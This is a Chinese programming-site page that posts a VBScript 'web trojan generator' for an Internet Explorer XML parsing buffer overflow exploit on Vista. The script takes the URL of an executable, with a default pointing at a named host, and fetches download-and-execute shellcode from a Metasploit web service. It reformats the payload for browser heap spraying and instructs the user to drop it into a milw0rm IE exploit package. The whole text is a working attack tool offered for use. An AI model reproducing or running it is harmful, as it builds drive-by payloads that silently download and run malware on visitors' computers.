欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

程序员文章站 2022-08-27 16:18:21
'code by lcx on error resume next exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.h...
'code by lcx

on error resume next
exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/payloads?parent=glob%280x25bfa38%29&module=win32_downloadexec&mode=generate&opt_url="&urlencoding(exeurl)&"&maxsize=&badchars=0x00+&encoder=default&action=generate+payload"


body = gethttppage(url)
set re = new regexp
re.pattern = "(\$shellcode \=[\s\s]+</div></pre>)"

set matches = re.execute(body)
if matches.count>0 then body = matches(0).value

code=trim(replace(replace(replace(replace(replace(replace(replace(body,"$shellcode =",""),chr(34),""),chr(13),""),";",""),"</div></pre>",""),chr(10),""),".",""))

function replaceregex(str)
set regex=new regexp
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function


function gethttppage(path)
t = getbody(path)
gethttppage = bytestobstr(t, "gb2312")
end function

function getbody(url)
on error resume next
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "get", url, false, "", ""
.send
getbody = .responsebody
end with
set retrieval = nothing
end function

function bytestobstr(body, cset)
dim objstream
set objstream = createobject("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.write body
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
set objstream = nothing
end function

function urlencoding(vstrin)
strreturn = ""
for aaaa = 1 to len(vstrin)
thischr = mid(vstrin,aaaa,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & "%" & hex(hight8) & "%" & hex(low8)
end if
next
urlencoding = strreturn
end function

set fso=createobject("scripting.filesystemobject")
set files=fso.opentextfile("a.txt",2,true)
files.writeline replaceregex(code)
'files.writeline body
wscript.echo replaceregex(code)
files.close
set fso=nothing

wscript.echo chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"